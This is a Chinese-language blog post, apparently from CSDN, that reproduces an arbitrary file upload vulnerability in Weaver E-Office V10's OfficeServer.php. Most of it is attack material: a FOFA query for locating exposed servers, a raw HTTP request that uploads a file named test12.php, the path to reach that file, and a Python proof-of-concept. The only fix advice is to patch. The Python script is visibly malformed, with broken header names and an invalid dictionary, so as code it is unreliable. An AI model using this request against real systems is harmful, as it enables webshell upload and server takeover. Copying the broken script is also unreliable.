• 泛微OA E-Office V10 OfficeServer 任意文件上传漏洞复现

    声明
    本文仅用于技术交流,请勿用于非法用途
    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

    漏洞简介

    泛微e-ofice是一款标准化的协同0A办公软件,泛微 E-ofice 10 0ficeServer 存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,在服务器上执行任意命令、读取敏感信息等

    FOFA语法

    body="eoffice10" && body="eoffice_loading_tip"

    Poc

    1. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
    2. Host: xxx.xxx.xxx.xxx
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    4. Content-Length: 395
    5. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    6. Accept-Encoding: gzip, deflate
    7. Connection: close
    8.  
    9. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    10. Content-Disposition: form-data; name="FileData"; filename="1.jpg"
    11. Content-Type: image/jpeg
    12.  
    14. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
    15. Content-Disposition: form-data; name="FormData"
    16.  
    17. {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
    18. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

     漏洞复现

    1、访问漏洞环境

    2、老形式,burp重放一下

    出现下面的状态码和响应包说明漏洞可能存在

    3、然后访问如下的URL链接,即可查看上传文件内容

    http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php

    poc(python脚本)

    1. import re
    2. import requests
    3.  
    4. url='http://xxxxxxxxxx/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
    5. headers = {
    6.     'User - Agent':'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
    7.     'Content - Length':'393',
    8.     'Content - Type': 'multipart / form - data;',
    9.     'boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs'
    10.     'Accept - Encoding': 'gzip, deflate',
    11.     'Connection':'close'
    12. }
    13.  
    14. data = {
    15.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs"
    16.     'Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"',
    17.     'Content-Type': 'image/jpeg'
    18.                     
    19.     ''
    20.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
    21.     'Content-Disposition': 'form-data; name="FormData"'
    22.  
    23.     "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}"
    24.     "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--"
    25. }
    26.  
    27. response = requests.post(url, headers=headers, data=data)
    28.  
    29. print('Status Code:', response.status_code)
    30.  
    31. if response.status_code == 200:
    32.     print("存在泛微OA E-Office V10 OfficeServer 任意文件上传漏洞!!")

    修复建议

    去官网打补丁

  • 相关阅读:
    基于Linux和C++的socket编程示例(TCP)
    智安网络|揭开云服务的神秘面纱:其含义和功能的综合指南
    hw share usb device caption description
    IP数据报格式
    uniapp中简单的前端文字校验
    代码随想录算法训练营第五十六天| 1143.最长公共子序列 、 1035.不相交的线 、53. 最大子序和 动态规划
    Python实战项目6-后端多方式登录接口/手机登录接口
    在任意位置插入
    vue3 + antdv table 展开行 expandedRowRender 根据判断条件动态显隐展开行的 icon
    【Python学习笔记】第二章循环:while循环,for循环,break和continue语句,死循环,循环的嵌套
  • 原文地址:https://blog.csdn.net/qq_56698744/article/details/133943903